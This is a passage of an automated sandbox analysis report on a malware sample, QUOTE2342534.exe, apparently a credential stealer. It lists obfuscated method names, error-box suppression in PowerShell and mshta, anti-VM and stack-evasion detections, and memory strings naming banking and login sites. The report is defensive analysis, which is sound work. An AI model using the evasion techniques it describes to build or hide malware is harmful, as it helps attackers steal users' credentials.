            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, QrrAevQFuxKJYAdplq.csHigh entropy of concatenated method names: 'Ww6oLGLa0H', 'gAkoeBjh4V', 'LnooR4wok8', 'bhjoGgB25N', 'jFcoYCFS4m', 'nF0oMX05gl', 'pDNlIw4hG8nXEKBIsd', 'iJ5wuISINQBspOb6u3', 'z7toolHUf2', 't4ooCm19sr'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, V6sh5ea6d9bGrdVyfIO.csHigh entropy of concatenated method names: 'tvrKPfVeqG', 'pDkKODuOed', 'z91KV4sPIb', 'sqEKrWJIpP', 'B9uKBhZ490', 'aToKwDuZwS', 'Wo9KJ8l2AR', 'vyyK95RFCb', 'io8KqWOHb5', 'XNtKsgNsDX'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, HksaVK8qpESfOv37Jt.csHigh entropy of concatenated method names: 'Dispose', 'qbmoHMRS2a', 'NKu45yTRQ2', 'O14UUhVcPK', 'XcXoIRE2kM', 'shtozseqIt', 'ProcessDialogKey', 'gwm4lbug0S', 'jLt4o1qYGj', 'ebW4467ukZ'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, antDFoW3jL51WwDMKQ.csHigh entropy of concatenated method names: 'oLOTrit6I1', 'xqqTwoUWGV', 'GX1T98kESU', 'hAmTqyc7NA', 'QjlTYT1VFa', 'HhXTMkmMED', 'jDSTQZQKma', 'gb3TkLfrh2', 'RB2TK1NgIc', 'Ka4Txx2noF'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, btQxbDHvSZeM3yABlR.csHigh entropy of concatenated method names: 'poPYhFkX4Q', 'KbbYDhvIjg', 'CB8Y8VtNu9', 'rocYa3wfac', 'DS7Y5bmfPr', 'BtvYS4RHYQ', 'm9cYvMBP4J', 'QyIYfieBFt', 'fhHY1hUXkE', 'URrYpgqs3k'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, JvaI8SaRcvwgX0l9NJu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NfNx8vB03G', 'LHhxaZl2Mm', 'sENxn9F9lm', 'asKxdaMZPZ', 'qNhxtcFpCA', 'YZaxWcZPHF', 'VmFxy4FRLF'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: QUOTE2342534.exe PID: 1992, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\mshta.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: 48C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: 8B40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: 9B40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: 9D50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: AD50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: B8F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: C8F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: D8F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0176096E rdtsc 4_2_0176096E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5523Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2244Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 9783Jump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\mshta.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\QUOTE2342534.exe TID: 3148Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6196Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 4028Thread sleep count: 190 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 4028Thread sleep time: -380000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 4028Thread sleep count: 9783 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exe TID: 4028Thread sleep time: -19566000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe TID: 3480Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe TID: 3480Thread sleep time: -61500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe TID: 3480Thread sleep time: -47000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mshta.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mshta.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F3C390 FindFirstFileW,FindNextFileW,FindClose,8_2_02F3C390
            Source: C:\Users\user\Desktop\QUOTE2342534.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 4-4-J4.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 4-4-J4.8.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 4-4-J4.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 4-4-J4.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 4-4-J4.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 4-4-J4.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 4-4-J4.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 4-4-J4.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 4-4-J4.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 4-4-J4.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
